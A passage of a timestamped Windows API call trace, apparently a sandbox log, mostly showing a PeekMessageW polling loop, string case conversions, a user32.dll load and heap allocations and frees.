wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.729] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.730] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.731] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.731] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.731] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.731] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.731] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.731] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.731] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.732] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.733] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.734] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.735] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.736] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.737] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.737] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.737] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.737] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.737] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.737] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.739] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.740] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.741] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0269.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0269.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.743] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0269.743] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0270.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0270.611] FreeLibrary (hLibModule=0x74f40000) returned 1 [0270.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0270.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0270.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0270.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0270.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0270.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0270.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0270.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0270.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0270.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0270.629] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0270.629] TranslateMessage 